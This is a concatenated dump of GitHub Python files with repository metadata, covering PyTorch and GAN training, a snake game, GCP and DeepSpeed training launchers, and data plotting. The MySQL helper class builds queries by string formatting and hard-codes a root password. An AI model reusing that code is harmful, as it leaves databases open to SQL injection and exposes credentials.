fmodule\nimport numpy as np\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight)\n m.bias.data.fill_(0.01)\n \ndef get_ultimate_layer(model: nn.Module):\n penul = get_module_from_model(model)[-1]._parameters['weight']\n return penul\n\nclass FeatureExtractor(FModule):\n def __init__(self, output_dim = 512):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, padding=2)\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, padding=2)\n 
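# 3136 = 64 channels x 7 x 7: each 2x2 max-pool below halves the 28x28 input, leaving 7x7 maps\n        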
self.fc1 = nn.Linear(3136, output_dim)\n self.apply(init_weights)\n \n def forward(self, x):\n \"\"\"\n This function returns the representation of x\n \"\"\"\n x = x.view((x.shape[0],28,28))\n x = x.unsqueeze(1)\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, x.shape[1] * x.shape[2] * x.shape[3])\n r_x = F.relu(self.fc1(x))\n r_x = r_x / torch.norm(r_x, dim=1, keepdim=True)\n return r_x\n \nclass Classifier(FModule): \n def __init__(self, input_dim = 512, output_dim = 10):\n super().__init__()\n self.fc2 = nn.Linear(input_dim, output_dim)\n self.apply(init_weights)\n \n def forward(self, r_x):\n \"\"\"\n This function returns the logits of r_x\n \"\"\"\n l_x = self.fc2(r_x)\n return l_x\n \nclass MaskGenerator(FModule):\n def __init__(self, input_dim = 100, mid_dim = 128, output_dim = 10):\n super().__init__()\n self.fc3 = nn.Linear(input_dim, mid_dim)\n self.fc4 = nn.Linear(mid_dim, output_dim)\n self.apply(init_weights)\n \n def forward(self, r_x):\n \"\"\"\n This function generate a mask's diagonal vector for each element in r_x,\n returning shape of b x 10\n \"\"\"\n dm_x = F.relu(self.fc3(r_x))\n dm_x = torch.softmax(self.fc4(dm_x), dim=1)\n dm_x = dm_x.view(r_x.shape[0], 10)\n return dm_x\n ","repo_name":"AIoT-Lab-BKAI/Hung-NN-verifiedFL","sub_path":"utils/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23211547809","text":"import argparse\nimport os\nimport numpy as np\nimport math\n\nimport torchvision.transforms as transforms\nfrom torchvision.utils import save_image\n\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\n\nimport visdom\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom dataset import Dataset\nimport GAN\nimport utils\n\nos.makedirs(\"images\", exist_ok=True)\n\nopt = utils.get_args()\nprint(opt)\n\nimg_shape = (opt.channels, opt.img_size, opt.img_size)\n\ncuda = True if torch.cuda.is_available() else False\n\n# Loss function\nadversarial_loss = torch.nn.BCELoss()\n\n# Initialize generator and discriminator\ngenerator = GAN.Generator(opt.latent_dim, img_shape)\ndiscriminator = GAN.Discriminator(img_shape)\n\nif cuda:\n generator.cuda()\n discriminator.cuda()\n adversarial_loss.cuda()\n\n# Configure data loader\nos.makedirs(\"../../data/mnist\", exist_ok=True)\n\ndata_dirs = [\"./MTFL/AFLW\", \"./MTFL/lfw_5590\", \"./MTFL/net_7876\"]\ndataset = Dataset(data_dirs)\n\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batch_size, shuffle=True)\n\n# Optimizers\noptimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\noptimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nif opt.if_visual:\n vis = visdom.Visdom(env='mygan')\n\n# ----------\n# Training\n# ----------\n\nfor epoch in range(opt.n_epochs):\n for i, imgs in enumerate(dataloader):\n\n # Adversarial ground truths\n valid = Variable(Tensor(imgs.size(0), 1).fill_(1.0), requires_grad=False)\n fake = Variable(Tensor(imgs.size(0), 1).fill_(0.0), requires_grad=False)\n\n # Configure input\n real_imgs = Variable(imgs.type(Tensor))\n\n # -----------------\n # Train Generator\n # -----------------\n\n optimizer_G.zero_grad()\n\n # Sample noise as generator input\n z = 
Variable(Tensor(np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim))))\n\n # Generate a batch of images\n gen_imgs = generator(z)\n\n # Loss measures generator's ability to fool the discriminator\n g_loss = adversarial_loss(discriminator(gen_imgs), valid)\n\n g_loss.backward()\n optimizer_G.step()\n\n # ---------------------\n # Train Discriminator\n # ---------------------\n\n optimizer_D.zero_grad()\n\n # Measure discriminator's ability to classify real from generated samples\n real_loss = adversarial_loss(discriminator(real_imgs), valid)\n fake_loss = adversarial_loss(discriminator(gen_imgs.detach()), fake)\n d_loss = (real_loss + fake_loss) / 2\n\n d_loss.backward()\n optimizer_D.step()\n\n print(\n \"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]\"\n % (epoch, opt.n_epochs, i, len(dataloader), d_loss.item(), g_loss.item())\n )\n\n x = torch.Tensor([epoch+0.003*i])\n y_d_loss = torch.Tensor([d_loss.item()])\n y_g_loss = torch.Tensor([g_loss.item()])\n y_sum_loss = torch.Tensor([d_loss.item() + g_loss.item()])\n vis.line(X=x, Y=y_d_loss, win=\"dloss\", update='append', opts={'title': 'y=d_loss'})\n vis.line(X=x, Y=y_g_loss, win=\"gloss\", update='append', opts={'title': 'y=g_loss'})\n vis.line(X=x, Y=y_sum_loss, win=\"d_g_loss\", update='append', opts={'title': 'y=sum_loss'})\n\n if epoch % opt.save_interval == 0:\n torch.save({\n 'epoch': epoch,\n 'generator_state_dict': generator.state_dict(),\n 'discriminator_state_dict': discriminator.state_dict(),\n 'generator_optimizer': optimizer_G.state_dict(),\n 'discriminator_optimizer': optimizer_D.state_dict(),\n }, \"save/face_model_%d.pkl\" % epoch)\n\n batches_done = epoch * len(dataloader) + i\n if batches_done % opt.sample_interval == 0:\n save_image(gen_imgs.data[:25], \"images/%d.png\" % batches_done, nrow=5, normalize=True)\n","repo_name":"zcoo/face_gan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44189730530","text":"from turtle import Screen, Turtle\r\nfrom snake import Snake\r\nimport time\r\nfrom food import Food\r\n\r\n\r\ndef create_scoreboard(turtles2, score):\r\n turtles2.penup()\r\n turtles2.hideturtle()\r\n turtles2.goto(0, 450)\r\n turtles2.color(\"red\")\r\n turtles2.write(f\"Score is {score}\", font=(\"Verdana\", 20, \"normal\"), align=\"center\")\r\n\r\n\r\ndef add_to_scoreboard(turtles2, score):\r\n turtles2.clear()\r\n turtles2.write(f\"Score is {score}\", font=(\"Verdana\", 20, \"normal\"), align=\"center\")\r\n\r\n\r\ndef main():\r\n screen = Screen()\r\n screen.setup(width=950, height=950)\r\n screen.bgcolor(\"black\")\r\n screen.title(\"My Snake Game-by Squid\")\r\n screen.tracer(0) # Turn turtle animation on/off and set delay for update drawings.\r\n\r\n snake1 = Snake() # call initialize snake function and save the list of turtle names\r\n food1 = Food()\r\n score1 = 0\r\n scoreboard1 = Turtle()\r\n create_scoreboard(scoreboard1, score1)\r\n\r\n screen.listen() # want to \"listen\" for arrow keys\r\n screen.onkey(snake1.move_up, \"Up\")\r\n screen.onkey(snake1.move_down, \"Down\")\r\n screen.onkey(snake1.move_left, \"Left\")\r\n screen.onkey(snake1.move_right, \"Right\")\r\n\r\n game_on = True\r\n while game_on:\r\n screen.update() # signals screen to update since with tracer set to zero it wont on its own\r\n time.sleep(0.1) # set a delay here by amount in sleep function call\r\n snake1.move_forward()\r\n\r\n if food1.distance(snake1.turt_list[0]) <= 
15: # detect a collision between snake and food\r\n score1 += 1\r\n print(F\"Collision! +1 to your score. Score is now: {score1}\")\r\n food1.move_rand()\r\n snake1.add_snake()\r\n add_to_scoreboard(scoreboard1, score1)\r\n if snake1.turt_list[0].xcor() > 500 or snake1.turt_list[0].xcor() < -500 or snake1.turt_list[0].ycor() > 500 or snake1.turt_list[0].ycor() < -500:\r\n game_on = False\r\n print(\"You hit a wall, game over\")\r\n for i in range(1, len(snake1.turt_list) - 1): # see if snake hits any turtle in snake except first one\r\n if snake1.turt_list[0].distance(snake1.turt_list[i]) <= 15:\r\n game_on = False\r\n print(\"You hit the snake, game over\")\r\n\r\n print(f\"Your final score is {score1}\")\r\n screen.exitonclick()\r\n\r\n\r\nmain()\r\n","repo_name":"reya01/Snake_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7299084063","text":"import os\nimport argparse\nimport json\nimport threading\nimport os.path\nfrom os import path\nimport time\nimport subprocess\nimport socket\nfrom queue import *\nimport random\n\nfrom logger import logger\nfrom env_vars import *\n\n# run one iteration of training\n#\n\nos.chdir(PROJECT_ROOT)\n\nwith open('gcp_config.json') as json_file:\n data = json.load(json_file)\n assert('num_leaves' in data)\n NUM_LEAVES = data['num_leaves']\n assert('run_id' in data)\n RUN_ID = data['run_id']\n assert('zone' in data)\n GCP_ZONE = data['zone']\n\ndef ScpFromLeaf(leaf_id, remote_filename, local_filename):\n assert(0 <= leaf_id and leaf_id < NUM_LEAVES)\n retry_cnt = 0\n cmd = 'gcloud beta compute --project edgect-1155 scp indigo-%s-leaf%d:%s %s --zone %s' % (RUN_ID, leaf_id, remote_filename, local_filename, GCP_ZONE)\n while True:\n exit_code = os.system(cmd)\n if exit_code == 256:\n # scp failed with some small probablity\n # just retry in this case\n retry_cnt += 1\n logger.warning('***WARN*** ssh failed, retrying.. leaf_id = %d, cnt = %d' % (leaf_id, retry_cnt))\n if retry_cnt > 10:\n break\n time.sleep(retry_cnt)\n else:\n break\n return exit_code\n\n\t\ndef ExecuteOnLeaf(leaf_id, command):\n assert(0 <= leaf_id and leaf_id < NUM_LEAVES)\n retry_cnt = 0\n cmd = 'gcloud beta compute --project edgect-1155 ssh --zone %s indigo-%s-leaf%d -- \"%s\"' % (GCP_ZONE, RUN_ID, leaf_id, command)\n while True:\n exit_code = os.system(cmd)\n if exit_code == 65280:\n # ssh failed with some small probablity\n # just retry in this case\n retry_cnt += 1\n logger.warning('***WARN*** ssh failed, retrying.. 
leaf_id = %d, cnt = %d' % (leaf_id, retry_cnt))\n if retry_cnt > 10:\n break\n time.sleep(retry_cnt)\n else:\n break\n return exit_code\n\nclass AsyncRunOnLeaf(threading.Thread):\n def __init__(self, leaf_id, fn):\n threading.Thread.__init__(self)\n self.fn = fn\n self.leaf_id = leaf_id\n self.daemon = True\n self.exit_code = -1\n\t\t\n def run(self):\n self.exit_code = self.fn(self.leaf_id)\n\t\ndef ExecuteOnAllLeaves(fn):\n threads = []\n for i in range(0, NUM_LEAVES):\n threads.append(AsyncRunOnLeaf(i, fn))\n threads[i].start()\n\t\n for i in range(0, NUM_LEAVES):\n threads[i].join()\n\t\n for i in range(0, NUM_LEAVES):\n assert(threads[i].exit_code == 0)\n\t\t\nos.chdir(PROJECT_ROOT + '/' + MODEL_REPO_NAME)\n\n# discard all changes from maybe failed previous iteration\n#\nexit_code = os.system('git reset --hard')\nassert(exit_code == 0) \n\n# read version number\n#\nwith open('version') as f:\n values = f.read().splitlines()\n assert(len(values) == 1)\n VERSION = int(values[0])\n assert(VERSION >= 0)\n\nos.chdir(PROJECT_ROOT)\n\nlogger.info('****** Training on model version %d ******' % VERSION)\n\ndef leaf_init(leaf_id):\n return ExecuteOnLeaf(leaf_id, 'cd %s/%s && git pull && git checkout %s && [ \\'0\\' == \\\\\"\\\\$(cat version)\\\\\" ] || (echo \\'Wrong version:\\' && cat version && false) && sudo insmod indigo.ko' % (TRAIN_REPO_NAME, MODEL_REPO_NAME, RUN_ID))\n\ndef leaf_update(leaf_id):\n return ExecuteOnLeaf(leaf_id, 'cd %s/%s && sudo rmmod indigo.ko && git pull && [ \\'%d\\' == \\\\\"\\\\$(cat version)\\\\\" ] || (echo \\'Wrong version:\\' && cat version && false) && sudo insmod indigo.ko' % (TRAIN_REPO_NAME, MODEL_REPO_NAME, VERSION))\n\t\nif (VERSION == 0):\n # for the first iteration, let the leaves pull the repo, checkout correct branch, and insmod\n ExecuteOnAllLeaves(leaf_init)\nelse:\n # for later iterations, just rmmod, pull the repo, and insmod\n ExecuteOnAllLeaves(leaf_update)\n\t\nlogger.info('****** All leaves updated LKM successfully, distributing tasks to leaves ******')\n\n# OK if exists\nos.system('mkdir training_data')\n\n# OK if not exist\nos.system('rm -rf training_data/%d' % VERSION)\n\nexit_code = os.system('mkdir training_data/%d' % VERSION)\nassert(exit_code == 0)\n\nq = Queue()\n\ndef collect_sample(leaf_id, task):\n task_id = task[0]\n repeat_id = task[1]\n exit_code = ExecuteOnLeaf(leaf_id, 'cd %s && python3 collect_data.py --task %d' % (TRAIN_REPO_NAME, task_id))\n if (exit_code != 0):\n logger.error('***ERR*** collect_data.py failed with exit code %d' % exit_code)\n return exit_code\n \n exit_code = ScpFromLeaf(leaf_id, '%s/training_output.npz' % TRAIN_REPO_NAME, 'training_data/%d/%d_%d.npz' % (VERSION, task_id, repeat_id))\n if (exit_code != 0):\n logger.error('***ERR*** scp failed with exit code %d' % exit_code)\n return exit_code\n \n return 0\n \ndef leaf_fn(leaf_id):\n ret = 0\n while True:\n item = q.get()\n if item is None:\n break\n exit_code = collect_sample(leaf_id, item)\n if (exit_code != 0):\n logger.error('***ERR*** Command failed with exit code %d! 
Leaf id: %d, item %s' % (exit_code, leaf_id, str(item)))\n ret = exit_code\n q.task_done()\n return ret\n \nwith open('workloads/config.json') as json_file:\n tasks_json = json.load(json_file) \n\nall_tasks = []\nfor i in range(0, len(tasks_json)):\n task = tasks_json[i]\n assert('repeats' in task)\n repeats = task['repeats']\n for k in range(0, repeats):\n all_tasks.append([i, k])\n \nrandom.shuffle(all_tasks)\n\nthreads = []\nfor i in range(0, NUM_LEAVES):\n threads.append(AsyncRunOnLeaf(i, leaf_fn))\n threads[i].start()\n\nfor item in all_tasks:\n q.put(item)\n\nq.join()\n\nfor i in range(0, NUM_LEAVES):\n q.put(None)\n\nfor i in range(0, NUM_LEAVES):\n threads[i].join()\n\nfor i in range(0, NUM_LEAVES):\n assert(threads[i].exit_code == 0)\n \nlogger.info('****** All leaf tasks completed successfully, training model ******')\n\nstart_time = time.time()\n\nexit_code = os.system('python3 run_trainer.py')\nassert(exit_code == 0)\n\nend_time = time.time()\n\nlogger.info('****** Training complete in %f sec, building .pb file ******' % (float(end_time - start_time)))\n\nexit_code = os.system('python3 build_pb_file.py')\nassert(exit_code == 0)\n\nlogger.info('****** .pb file build complete, building LKM file ******')\n\nexit_code = os.system('python3 build_lkm_file.py')\nassert(exit_code == 0)\n\nlogger.info('****** LKM file build complete, incrementing model version to %d and committing model ******' % (VERSION + 1))\n\nexit_code = os.system('echo \"%d\" > %s/version' % (VERSION + 1, MODEL_REPO_NAME))\nassert(exit_code == 0)\n\nexit_code = os.system('python3 commit_model.py')\nassert(exit_code == 0)\n\nlogger.info('****** Training on model version %d complete, now model version is incremented to %d ******' % (VERSION, VERSION + 1))\n\n","repo_name":"sillycross/indigo-trainer","sub_path":"run_one_iteration.py","file_name":"run_one_iteration.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28573715624","text":"import sys\nimport unittest\nfrom unittest import TestCase\n\nfrom simplejson import encoder, scanner\n\n\ndef has_speedups():\n return encoder.c_make_encoder is not None\n\n\ndef skip_if_speedups_missing(func):\n def wrapper(*args, **kwargs):\n if not has_speedups():\n if hasattr(unittest, 'SkipTest'):\n raise unittest.SkipTest(\"C Extension not available\")\n else:\n sys.stdout.write(\"C Extension not available\")\n return\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass TestDecode(TestCase):\n @skip_if_speedups_missing\n def test_make_scanner(self):\n self.assertRaises(AttributeError, scanner.c_make_scanner, 1)\n\n @skip_if_speedups_missing\n def test_make_encoder(self):\n self.assertRaises(\n TypeError,\n encoder.c_make_encoder,\n None,\n (\"\\xCD\\x7D\\x3D\\x4E\\x12\\x4C\\xF9\\x79\\xD7\"\n \"\\x52\\xBA\\x82\\xF2\\x27\\x4A\\x7D\\xA0\\xCA\\x75\"),\n None\n )\n","repo_name":"ryfeus/lambda-packs","sub_path":"Selenium_PhantomJS/source/simplejson/tests/test_speedups.py","file_name":"test_speedups.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1104,"dataset":"github-code","pt":"22"} +{"seq_id":"23974714265","text":"import pymysql\n\n\nclass SQLdb:\n def __init__(self):\n self.dataBase = pymysql.connect(host=\"localhost\", port=3306, user=\"root\", password=\"150492\", db=\"test\")\n self.cursor = self.dataBase.cursor()\n\n\n def insert(self, table, id, name, cost):\n query = \"INSERT INTO %s(id,name,cost) 
VALUES(%d,\\\"%s\\\",\\\"%s\\\")\" % (table, id, name, cost)\n        try:\n            self.cursor.execute(query)\n            self.dataBase.commit()\n\n        except Exception as e:\n            # print the actual error, not the Exception class itself\n            print(e)\n            self.dataBase.rollback()\n\n        finally:\n            # note: the connection is closed here, so each SQLdb instance supports a single call\n            self.dataBase.close()\n\n    def update(self, table, id, column, newValue):\n        query = \"UPDATE %s SET %s = %s WHERE id = %d\" % (table, column, newValue, id)\n        try:\n            self.cursor.execute(query)\n            self.dataBase.commit()\n\n        except Exception as e:\n            print(e)\n            self.dataBase.rollback()\n\n        finally:\n            self.dataBase.close()\n\n    def delete(self, table, column, key):\n        query = \"DELETE FROM %s WHERE %s = \\\"%s\\\"\" % (table, column, key)\n        try:\n            self.cursor.execute(query)\n            self.dataBase.commit()\n\n        except Exception as e:\n            print(e)\n            self.dataBase.rollback()\n\n        finally:\n            self.dataBase.close()\n\ndb = SQLdb()\ndb.delete('items', 'id', '7777')\n\n\n","repo_name":"idoFinder/Festivow_4","sub_path":"SQLdb.py","file_name":"SQLdb.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40361779830","text":"import argparse\nimport warnings\nimport subprocess\nimport os\nimport datetime\nimport time\n\nstep_dirs = {\n    1: \"training/step1_supervised_finetuning\",\n    2: \"training/step2_reward_model_finetuning\",\n    3: \"training/step3_rlhf_finetuning\",\n}\nmodel_type = {1: \"actor\", 2: \"reward\", 3: \"step3\"}\ndse_url = \"https://github.com/microsoft/DeepSpeedExamples/tree/master/applications/DeepSpeed-Chat/\"\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"--step\",\n        type=int,\n        nargs=\"+\",\n        choices=(1, 2, 3),\n        default=(1, 2, 3),\n        help=\"Which steps of the ChatGPT example to run\",\n    )\n    parser.add_argument(\n        \"--actor-model\",\n        type=lambda x: x.replace(\"facebook/opt-\", \"\"),\n        default=\"1.3b\",\n        choices=(\"1.3b\", \"6.7b\", \"13b\", \"66b\"),\n        help=\"Which facebook/opt-* model to use for Actor (step 1)\",\n    )\n    parser.add_argument(\n        \"--reward-model\",\n        type=lambda x: x.replace(\"facebook/opt-\", \"\"),\n        default=\"350m\",\n        choices=(\"350m\",),  # one-element tuple; a bare string would make each character a valid choice\n        help=\"Which facebook/opt-* model to use for Reward (step 2)\",\n    )\n    parser.add_argument(\n        \"--actor-zero-stage\",\n        type=str,\n        default=\"\",\n        choices=(\"\", \"0\", \"1\", \"2\", \"3\"),\n        help=\"ZeRO stage for step 1 (Actor) training\",\n    )\n    parser.add_argument(\n        \"--reward-zero-stage\",\n        type=str,\n        default=\"\",\n        choices=(\"\", \"0\", \"1\", \"2\", \"3\"),\n        help=\"ZeRO stage for step 2 (Critic) training\",\n    )\n    parser.add_argument(\n        \"--output-dir\",\n        type=lambda x: os.path.abspath(x),\n        default=\"./output\",\n        help=\"Directory for output of each step\",\n    )\n    parser.add_argument(\n        \"--deployment-type\",\n        type=str,\n        default=\"single_gpu\",\n        choices=(\"single_gpu\", \"single_node\", \"multi_node\"),\n        help=\"Number of GPUs to run the actor/reward models on\",\n    )\n    args = parser.parse_args()\n\n    if args.actor_zero_stage != \"\" or args.reward_zero_stage != \"\":\n        warnings.warn(\n            \"Non-default zero stages may result in OOM errors or worse performance.\"\n        )\n\n    return args\n\n\ndef get_model_size(args, step_num):\n    if step_num == 3:\n        return get_model_size(args, 1)\n    return getattr(args, f\"{model_type[step_num]}_model\")\n\n\ndef get_zero_stage(args, step_num):\n    return getattr(args, f\"{model_type[step_num]}_zero_stage\")\n\n\ndef get_output_dir(args, step_num):\n    model_size = get_model_size(args, step_num)\n    output_dir = os.path.join(args.output_dir,\n                              
f\"{model_type[step_num]}-models\",\n f\"{model_size}\")\n return output_dir\n\n\ndef get_script(args, step_num):\n model_size = get_model_size(args, step_num)\n script = os.path.join(\n os.getcwd(),\n step_dirs[step_num],\n \"training_scripts/opt/\",\n args.deployment_type,\n f\"run_{model_size}.sh\",\n )\n assert os.path.isfile(\n script\n ), f\"{script} does not exist.\\n\\n Use examples in {os.path.dirname(script)} as a template.\"\n\n return script\n\n\ndef verify_model(args, step_num):\n output_dir = get_output_dir(args, step_num)\n model_size = get_model_size(args, step_num)\n model_file = os.path.join(output_dir, \"pytorch_model.bin\")\n if not os.path.isfile(model_file):\n error_str = f\"Step {step_num} model has not been trained. Train it with:\\n\"\n error_str += f\"python3 train.py --step {step_num}\"\n error_str += f\" --{model_type[step_num]}-model {model_size}\"\n raise RuntimeError(error_str)\n\n\ndef get_cmd(args, step_num):\n output_dir = get_output_dir(args, step_num)\n script = get_script(args, step_num)\n\n if step_num in (1, 2):\n zero_stage = get_zero_stage(args, step_num)\n cmd = f\"bash {script} {output_dir} {zero_stage}\"\n if step_num == 3:\n verify_model(args, 1) # Verify step 1 model exists\n verify_model(args, 2) # Verify step 2 model exists\n s1_dir, s1_zs = get_output_dir(args, 1), get_zero_stage(args, 1)\n s2_dir, s2_zs = get_output_dir(args, 2), get_zero_stage(args, 2)\n cmd = f\"bash {script} {s1_dir} {s2_dir} '{s1_zs}' '{s2_zs}' {output_dir}\"\n\n return cmd\n\n\ndef launch_cmd(args, step_num, cmd):\n working_dir = step_dirs[step_num]\n print(f\"Running:\\n{cmd}\")\n p = subprocess.Popen(cmd, cwd=working_dir, shell=True)\n p.wait()\n if p.returncode != 0:\n raise RuntimeError('\\n\\n'.join((\n f\"Step {step_num} exited with non-zero status {p.returncode}\",\n f\"Launch command: {cmd}\",\n f\"Log output: {os.path.join(get_output_dir(args, step_num), 'training.log')}\",\n f\"Please see our tutorial at {dse_url}{step_dirs[step_num]}\",\n \"Please check that you have installed our requirements: `pip install -r requirements.txt`\",\n f\"If you are seeing an OOM error, try modifying {get_script(args, step_num)}:\",\n \" - Reduce `--per_device_*_batch_size`\",\n \" - Increase `--zero_stage {0,1,2,3}` on multi-gpu setups\",\n \" - Enable `--gradient_checkpointing` or `--only_optimize_lora`\"\n )))\n\n\ndef main(args):\n start_time = time.time()\n for step_num in args.step:\n print(f\"---=== Running Step {step_num} ===---\")\n step_start_time = time.time()\n\n cmd = get_cmd(args, step_num)\n launch_cmd(args, step_num, cmd)\n\n step_time = int(time.time() - start_time)\n time_str = str(datetime.timedelta(seconds=step_time))\n print(f\"---=== Finished Step {step_num} in {time_str} ===---\")\n\n total_time = int(time.time() - start_time)\n time_str = str(datetime.timedelta(seconds=total_time))\n\n if len(args.step) > 1:\n print(f\"---=== Finished Steps {args.step} in {time_str} ===---\")\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n","repo_name":"microsoft/DeepSpeedExamples","sub_path":"applications/DeepSpeed-Chat/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","stars":5145,"dataset":"github-code","pt":"22"} +{"seq_id":"16127693742","text":"from random import seed\nfrom random import choice\nfrom random import randint\nfrom string import ascii_letters\nseed(1258847)\n\na = []\n\ndef random_string_generator():\n r = \"\"\n my_str = \"\"\n for e in range(1,3):\n 
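# range(1,3) iterates exactly twice, so the sampling alphabet built below holds two lowercase letters\n        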
my_str += choice(ascii_letters).lower()\n for o in range(randint(1,15)):\n idx = randint(1,len(my_str) - 1)\n r += choice(my_str)\n return r\n\n\nfor e in range(19075):\n v = random_string_generator()\n m = message_optimizer(v)\n a.append(m)\n","repo_name":"projeto-exercicios/Exercicios-Python-de-correccao-automatica","sub_path":"03_Implementacao/DataBase/true_or_false_question_message_optimizer/question/version_2/program2.py","file_name":"program2.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36175424293","text":"import matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom scipy.ndimage.filters import gaussian_filter1d, gaussian_filter\nfrom scipy import interpolate\nimport numpy as np\nfrom matplotlib.animation import FuncAnimation, PillowWriter\n\nf = open('data/nvwater.txt','r')\nlines = f.readlines()\n\n#print(\"----------------------------------------------------------\")\n\ncodesRaw=lines[12786:12958]\ncodesDict={\"fields\":{}}\n\nformat=lines[12959][:-2].split(\"\\t\")\nhuh=lines[12960][:-2].split(\"\\t\")\ndata=lines[12961:278769]\n\n#print(format)\n#print(data[0][:-2].split(\"\\t\"))\n\n#print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\nkey1 = \"fields\"\n\nfor el in codesRaw:\n status=el[2:-2].split()\n if len(status)==0:\n continue\n elif status[0]==\"Referenced\":\n for elf in status[1:]:\n if elf[0]==\"(\":\n key1=elf[1:-1]##search for key in ()\n codesDict[key1]={}\n #print(key1)\n else:\n key2=status[0]\n phrase=\"\"\n for a in status[1:]:\n phrase=phrase+\" \"+a\n codesDict[key1][key2]=phrase[1:]\n\n#print(codesDict[\"lev_acy_cd\"])\n\n#print(\"###########################################\")\n\nf2 = open('data/gwsites.txt','r')\nlines2 = f2.readlines()\n\nnames=lines2[12:24]\ntitles=lines2[32]\nsitesRaw=lines2[34:]\n\n\n\n#rint(titles)\n\nsiteDict={}\n\nfor name in names:\n key=name.split()[1]\n phrase=\"\"\n for a in name.split()[3:]:\n phrase=phrase+\" \"+a\n siteDict[key]=phrase[1:]\n\nsites={}\n\nfor site in sitesRaw:\n sp=site.split(\"\\t\")\n id=sp[0]\n sites[id]={\"data\":{}}\n for i in range(12):\n key=titles.split()[i+1]\n if key!=\"coord_acy_cd'\" and key!=\"dec_coord_datum_cd\" and key!=\"alt_datum_cd\" and key!=\"alt_acy_va\":\n if key==\"gw_count_nu\":\n sites[id][key]=sp[i+1][:-1]\n else:\n sites[id][key]=sp[i+1]\n if int(sites[id][\"gw_count_nu\"])>2000:\n print(id)\n \n\n\n#print(sites['331923114513301'])\n\ndates=[]\ncount=[]\nidn='360349115100001'\nfor pt in data:\n dat=pt[:-2].split(\"\\t\")\n if dat[1]==idn:\n dates.append(datetime.fromisoformat(dat[3]).timestamp()/31536000+1970)\n count.append(-1*float(dat[6]))\ny = gaussian_filter1d(count, sigma=2)\n#plt.plot(dates,y)\n#plt.show()\n\ndef isNumber(s):\n try:\n float(s) # for int, long and float\n except ValueError:\n return False\n return True\n\n\nx2=[]\ny2=[]\n\nfor site in sitesRaw:\n sp=site.split(\"\\t\")\n id=sp[0]\n \n lon=sites[id][\"dec_lat_va\"]\n lat=sites[id][\"dec_long_va\"]\n \n if isNumber(lon) and isNumber(lat) and int(sites[id][\"gw_count_nu\"]):\n lon=float(lon)\n lat=float(lat)\n \n x2.append(lat)\n y2.append(lon)\n \n#plt.scatter(y2,x2)#,alpha=0.1)\n#plt.show()\n\n#985,722,613\ntimeData=np.zeros((90,722,613))\nref=np.zeros((90,722,613))\n\nfor pt in data:\n dat=pt[:-2].split(\"\\t\")\n id=dat[1]\n \n #print(dat[1]==idn)\n if isNumber(dat[6]):\n val=float(dat[6])\n if len(dat[3])==7:\n dat[3]+=\"-01\"\n if len(dat[3])==4:\n dat[3]+=\"-01-01\"\n 
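# dat[3] is now a full YYYY-MM-DD string (year-only and year-month dates were padded above), so it is safe as a key\n        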
sites[id][\"data\"][dat[3]]=val\n #month=(int(dat[3][:4])-1938)*12+int(dat[3][5:7])\n year=int(dat[3][:4])-1938\n lon=sites[id][\"dec_lat_va\"]\n lat=sites[id][\"dec_long_va\"]\n if isNumber(lon) and isNumber(lat) and int(sites[id][\"gw_count_nu\"]):\n lon=(float(lon)-34.8)*100\n lat=(float(lat)+120.17)*100\n num=ref[year,int(lon),int(lat)]\n timeData[year,int(lon),int(lat)]=(num*timeData[year,int(lon),int(lat)]+val)/(num+1)\n ref[year,int(lon),int(lat)]+=1\n\nfig = plt.figure()\nax = plt.axes() \n\nplt.title('Water Visualization')\n\n#z = timeData[50,:,:]\n#z = np.flip(np.flip(gaussian_filter(timeData[500,:,:],sigma=6)),1)\n#cont = plt.imshow(z)\n\nco=0\nfor i in range(timeData.shape[1]):\n for j in range(timeData.shape[2]):\n con=0\n for k in range(timeData.shape[0]):\n if timeData[k,i,j]!=0:\n con+=1\n if con>3:\n co+=1\n print(i,end='\\r')\nprint(co)\n\n##baseline\n#for i in range(timeData.size)\n\n\n\nplt.show()\n\n# Animation function\n#def animate(i): \n# z = gaussian_filter(timeData[i,:,:],sigma=3)\n# #z = data[:,:,i]\n# cont = plt.imshow(z)\n# \n# print(i,end='\\r')\n# return cont \n\n#anim = FuncAnimation(fig, animate, frames=timeData.shape[0])\n#anim.save('basic_animation.gif', 